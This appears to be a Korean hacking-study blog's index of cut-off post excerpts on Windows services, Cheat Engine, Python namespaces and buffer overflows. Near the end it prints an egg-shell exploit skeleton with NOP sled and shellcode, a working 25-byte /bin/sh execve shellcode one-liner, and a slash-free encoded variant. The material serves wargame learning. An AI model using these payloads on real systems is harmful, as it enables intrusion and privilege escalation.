1q

서비스(Service) 프로그램은 SCM(Service Control Manager)에 의해서 관리가 됩니다.서비스 애플리케이션이 실행되기 위해서는 시작 명령을 내려줄 수 있는 서비스 제어기(Service Controller)가 필요합니다.서비스 제어기는 SCM에게 서비스 제어 요청을 하면 SCM이 서비스 프로그램에게 제어 명령을 전달하고 리턴 값을 돌려 받는 구조로 되어 있습니다. 모든 서비스 프로그램은 외부(서비스 제어기)에서 StartService() API를 호출하면서 시작됩니다. 서비스 프로세스 시작 과정 1. 서비스 제어기에서 StartService() 호출- 서비스 제어기에서 StartService()를 호출하면 SCM은 해당 서비스 프로세스를 생성합니다. 그리고 서비스 프로세스의 EP 코드..

출처 : Anch0vy 님

#include /* The 'main' function of Win32 GUI programs: this is where execution starts */int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) {int is_ok = MessageBox(NULL, "Fukkking", "hack", MB_YESNO);if (is_ok == IDYES){MessageBox(NULL, "hacked!", "hack!", MB_ICONINFORMATION);HWND window = FindWindow(NULL, "Shadow Defender");if(window == NULL){MessageB..

Cheat Engine으로는 메모리를 조작할 수가 있습니다. 온라인 게임이나 설치를 할 시에 약관동의를 읽어보면 메모리 변조를 할 시에 처벌이 나오는데 하지 않는게 앞으로 생활하는데 평탄할 것입니다:D * 연습용으로 지뢰찾기나 싱글게임 같은 것을 크랙해보면 많은 공부가 됩니다. http://www.cheatengine.org 에 들어가면 Cheat Engine 최신 버전을 받을 수가 있습니다. 설치 도중에 이 부분에서는 아래 사용자 지정 설치(고급)을 누르고 Opera 설치를 체크 해제합니다. 빠른 설치(권장)이나, Opera 설치 체크 해제를 하지 않으면 설치하고 싶지 않은 프로그램이 설치가 되어서 성질을 긁습니다. 튜토리얼을 하고 싶으면 YES를 누르고, 툴 사용법을 안다면 NO를 누르고 바로 툴을 ..

파이썬 프로그래밍을 보다보면 아래와 같은 문장을 만나곤 한다. 정확하게 어떤 의미인지 알고 싶어 여기저기 검색한 내용을 정리했다. if __name__ == "__main__" 이 문장을 이해하기 위해서는 파이썬의 namespace 라는 개념을 이해해야 한다. namespace 를 얘기하기 이전에 파이썬에서 name(변수명)이 의미하는 것을 생각해보자. 아래와 같이 파이썬에서는 name 에 값을 줄 수 있다. 그리고 값 뿐 아니라 function 과 같은 형태도 name 을 줄 수 있다. 또한 동일한 name을 재사용할 수 있다. i = 12s = "Hello World"l = [1, 2, 3] def foo():print("This is a function")f = foo var = 12var = "H..

┏┳━┳┳━━┳━━━┳━━━┳━━━┳━┳━┳━┳━┳━━━┓┃┃ ┃┃ ┃ ━┫ ━┫ ┃ ┃ ┃ ┃ ┃ ━╋┓┃ ┃ ┃ ┃ ┃ ┏━┫ ┃ ┃ ┃┃ ┃ ┃ ┣━ ┃ ━┫ ┃ ┣┓ ┏╋━ ┃┃ ┣━━━┻━━┻━━━┻━━━┻━━━┻━━━┛┗━┛┗━━━┫┃┃Since 2002. W / I / S / E / G / U / Y / S in HackerSchool ┃┃┃http://wiseguys.hackerschool.org wiseguys@hackerschool.org ┃┃┗┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛┃ ┗━━━━━━━━━━━━━━━━━━━━Designed by FiaDot━┛ ━[Document Infomation] ━━━━━━━━━━━━━━━━━━━━━ :: Title :: 버퍼 오버..

#include #include #include #define DEFAULT_OFFSET 0 #define DEFAULT_BUFFER_SIZE 512 #define DEFAULT_EGG_SIZE 2048 #define NOP 0x90 char shellcode[] = "\x31\xc0\xb0\xc9\xcd\x80\x89\xc2\x31\xc0\xb0\x46\x31\xdb\x89\xd3\x31\xc9\x66\x89\xd9\xcd\x80\xeb\x50\x5e\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x04\xb3\x01\x89\xf1\xb2\x30\xcd\x80\x83\x06\x05\x83\x46\x01\x20\x83\x46\x02\x17\x83\x46\x03\x2d\x83\x6e\x0..

25byte shellcode`perl -e 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"'` (%2f) 없는 shellcode \xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81